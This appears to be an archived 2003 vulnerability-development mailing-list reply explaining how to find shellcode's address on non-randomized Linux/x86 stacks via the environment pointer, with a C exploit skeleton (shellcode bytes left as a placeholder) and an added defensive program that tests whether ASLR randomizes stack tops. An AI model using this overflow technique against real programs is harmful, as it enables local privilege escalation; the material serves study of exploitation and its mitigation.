Vulnerability Development mailing list archives
Re: Automatic discovery of shellcode address
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Tue, 25 Mar 2003 01:38:50 +0100 (CET)
On Mon, 24 Mar 2003 steve () uk intasys com wrote:
That wasn't the part that I was considering as being novel. When I've coded things before I've spent most of my time determining where the return address lies within the area I've overflowed. (By doing a binary search of my 'XXXXXX's). I was thinking that by knowing the address of the buffer in the process's memory space this would reduce the number of trials down to four. (To deal with alignment issues).
If you are exploiting a local vulnerability you can also use the even simpler env pointer technique to locate the shellcode.

    #include <string.h>
    #include <unistd.h>

    #define BUF   512   /* placeholder: not given in the post, size of the target buffer */
    #define ALIGN 0     /* placeholder: not given in the post, 0..3 to fix alignment */

    /* placeholder: the post does not include the shellcode bytes */
    static char sc[] = "<shellcode bytes go here>";

    int main(void)
    {
        char *env[2] = {sc, NULL};        /* the shellcode is the only env string */
        char buf[BUF];
        int i;
        unsigned int *ap = (unsigned int *)(buf + ALIGN);
        /* on a non-randomized Linux/x86 stack the env strings sit right
           below the program path at the top, so the address is fixed */
        unsigned int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

        /* fill the buffer with the address, leaving room for a NULL word */
        for (i = ALIGN; i + 8 <= BUF; i += 4)
            *ap++ = ret;
        *ap = 0x0;
        execle("./vuln-program", "vuln-program", buf, NULL, env);
        return 1;   /* only reached if execle fails */
    }

As you can see, for ./vuln-program the shellcode will always be at:

    0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor

Antifork Research, Inc. 0xdeadbeef | raptor's labs
http://www.antifork.org http://www.0xdeadbeef.info
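The technique above only works because the stack top of every new process sits at the same address (0xbffffffa on the Linux/x86 systems of the time), so the location of an environment string can be computed ahead of time. Stack randomization (ASLR) is the mitigation that removes that fixed point. The following is an added example, not code from the thread or from its authors: it reads the kernel's randomize_va_space setting and samples the [stack] mapping of several freshly exec'd child processes to show whether the stack top is still predictable on the machine it runs on. It assumes Linux with /proc mounted and a working /bin/sh; the function names (aslr_setting, sample_stack_top, count_distinct_stack_tops) are this example's own.

```c
/* Added example (not from the original thread): does this system still
 * place the stack at a fixed address?  Linux-only: uses /proc and popen(). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns the kernel ASLR setting (0 = off, 1 = stack/mmap, 2 = also brk),
 * or -1 if /proc/sys/kernel/randomize_va_space cannot be read. */
int aslr_setting(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* Execs one child (`cat /proc/self/maps`) and returns the end address of
 * the child's [stack] mapping, i.e. its stack top, or 0 on failure. */
unsigned long sample_stack_top(void)
{
    FILE *p = popen("cat /proc/self/maps", "r");
    char line[512];
    unsigned long top = 0;
    if (p == NULL)
        return 0;
    while (fgets(line, sizeof line, p) != NULL) {
        if (strstr(line, "[stack]") != NULL) {
            /* a maps line looks like "7ffd...000-7ffd...000 rw-p ... [stack]" */
            char *dash = strchr(line, '-');
            if (dash != NULL)
                top = strtoul(dash + 1, NULL, 16);
            break;
        }
    }
    pclose(p);
    return top;
}

/* Samples `runs` children (1..64) and returns how many distinct stack tops
 * were observed, or -1 if sampling failed.  Without ASLR every child reports
 * the same address; with ASLR the count approaches `runs`. */
int count_distinct_stack_tops(int runs)
{
    unsigned long seen[64];
    int n = 0, i, j;
    if (runs < 1 || runs > 64)
        return -1;
    for (i = 0; i < runs; i++) {
        unsigned long top = sample_stack_top();
        if (top == 0)
            return -1;
        for (j = 0; j < n; j++)
            if (seen[j] == top)
                break;
        if (j == n)
            seen[n++] = top;
    }
    return n;
}

int main(void)
{
    int setting = aslr_setting();
    int distinct = count_distinct_stack_tops(8);
    printf("randomize_va_space = %d\n", setting);
    printf("distinct stack tops in 8 runs = %d\n", distinct);
    if (distinct == 1)
        puts("stack top is predictable: a fixed env-string address can be computed");
    else if (distinct > 1)
        puts("stack top is randomized: the fixed 0xbffffffa assumption does not hold");
    else
        puts("could not sample child processes (no /proc or no shell?)");
    return 0;
}
```

Eight samples are enough to tell the two cases apart: with randomization on, the chance that every child lands on the same stack top is negligible, while with randomization off (randomize_va_space = 0, or a process tree running under setarch -R) the count is exactly one.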
Current thread:
- Automatic discovery of shellcode address steve (Mar 23)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Marco Ivaldi (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Joel Eriksson (Mar 28)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)